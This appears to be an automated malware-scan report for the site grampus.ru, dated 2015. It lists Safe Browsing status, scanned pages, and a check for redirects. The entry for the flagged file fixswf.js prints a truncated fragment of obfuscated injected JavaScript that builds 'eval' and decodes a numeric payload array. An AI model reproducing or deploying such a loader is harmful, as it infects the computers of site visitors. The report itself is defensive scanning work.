Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grampus.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://grampus.ru/ | 200 OK Content-Length: 15318 Content-Type: text/html | clean |
http://grampus.ru/javamenu/stmenu.js | 404 Not Found Content-Length: 15318 Content-Type: text/html | clean |
http://grampus.ru/str/fixswf.js | 200 OK Content-Length: 7837 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) v="v"+"al";if(020===0x10&&window.document)try{document.body++}catch(gdsgsdg){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){w={a:window}.a;v="e".concat(v);}}e=w[""+v];if(1){f=new Array(102,116,108,99,115,103,111,109,30,110,100,118,116,81,95,110,99,109,109,77,115,109,97,99,114,39,39,123,9,30,32,31,30,118,96,112,32,103,103,32,60,30,116,103,103,115,45,113,101,100,98,32,46,30,116,103,103,115,45,79,59,9,30,32,31,30,118,96,112,32,107,109,32,60 e(s) Antivirus reports:
| ||
http://grampus.ru/pages/16/ | 200 OK Content-Length: 13714 Content-Type: text/html | clean |
http://grampus.ru/pages/17/ | 200 OK Content-Length: 13786 Content-Type: text/html | clean |
http://grampus.ru/pages/2/ | 200 OK Content-Length: 20983 Content-Type: text/html | clean |
http://grampus.ru/pages/7/ | 200 OK Content-Length: 20573 Content-Type: text/html | clean |
http://grampus.ru/pages/18/ | 200 OK Content-Length: 18624 Content-Type: text/html | clean |
http://grampus.ru/pages/19/ | 200 OK Content-Length: 14995 Content-Type: text/html | clean |
http://grampus.ru/pages/8/ | 200 OK Content-Length: 16177 Content-Type: text/html | clean |
http://grampus.ru/pages/10/ | 200 OK Content-Length: 15441 Content-Type: text/html | clean |
http://grampus.ru/pages/25/ | 200 OK Content-Length: 18728 Content-Type: text/html | clean |
http://grampus.ru/pages/26/ | 200 OK Content-Length: 16458 Content-Type: text/html | clean |
http://grampus.ru/pages/5/ | 200 OK Content-Length: 56698 Content-Type: text/html | clean |
http://grampus.ru/pages/6/ | 200 OK Content-Length: 17980 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grampus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 13:22:28 GMT
Pragma: no-cache
Server: Apache/2.2.25 (FreeBSD)
Content-Language: ru
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9k41hp4nv4mrd06rkco7p7um45; path=/
X-Cache: MISS from t1.hoster.ru
X-Cache-Lookup: MISS from t1.hoster.ru:6666
GET / HTTP/1.1
Host: grampus.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 13:22:28 GMT
Pragma: no-cache
Server: Apache/2.2.25 (FreeBSD)
Content-Language: ru
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9k41hp4nv4mrd06rkco7p7um45; path=/
X-Cache: MISS from t1.hoster.ru
X-Cache-Lookup: MISS from t1.hoster.ru:6666
Second query (visit from search engine):
GET / HTTP/1.1
Host: grampus.ru
Referer: http://www.google.com/search?q=grampus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grampus.ru
Referer: http://www.google.com/search?q=grampus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.